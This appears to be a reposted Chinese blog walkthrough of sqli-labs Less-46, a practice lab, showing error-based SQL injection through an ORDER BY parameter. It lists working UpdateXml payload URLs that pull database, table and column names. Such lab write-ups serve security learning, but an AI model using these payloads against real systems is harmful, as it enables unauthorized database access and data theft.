sqli-labs less46 GET -Error based -Numeric -Order By Clause(GET型基于错误的数字型Order By从句注入)

Posted superkrissv

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqli-labs less46 GET -Error based -Numeric -Order By Clause(GET型基于错误的数字型Order By从句注入)相关的知识,希望对你有一定的参考价值。

技术分享图片

http://192.168.136.128/sqli-labs-master/Less-46/?sort=1

技术分享图片

sort=4时出现报错

技术分享图片

说明参数是添加在order by 之后

错误信息没有屏蔽,直接使用UpdateXml函数报错

http://192.168.136.128/sqli-labs-master/Less-46/?sort=4 and UpdateXml(1,concat(0x7e,database(),0x7e),1)%23

技术分享图片

http://192.168.136.128/sqli-labs-master/Less-46/?sort=4 and UpdateXml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=‘security‘ limit 3,1),0x7e),1)%23

技术分享图片

http://192.168.136.128/sqli-labs-master/Less-46/?sort=4 and UpdateXml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema=‘security‘ and table_name=‘users‘ limit 1,1),0x7e),1)%23

技术分享图片

以上是关于sqli-labs less46 GET -Error based -Numeric -Order By Clause(GET型基于错误的数字型Order By从句注入)的主要内容,如果未能解决你的问题,请参考以下文章

sqli-labs less46-53

SQLi-LABS Page-3 (order by injections) Less-46-Less-53

sqli-labs less33 GET- Bypass AddSlashes (GET型绕过addslashes() 函数的宽字节注入)

sqli-labs less2 GET - Error based - Intiger based (基于错误的GET整型注入)

SQL注入SQLi-LABS Page-1(Basic Challenges Less1-Less22)

SQL注入SQLi-LABS Page-1(Basic Challenges Less1-Less22)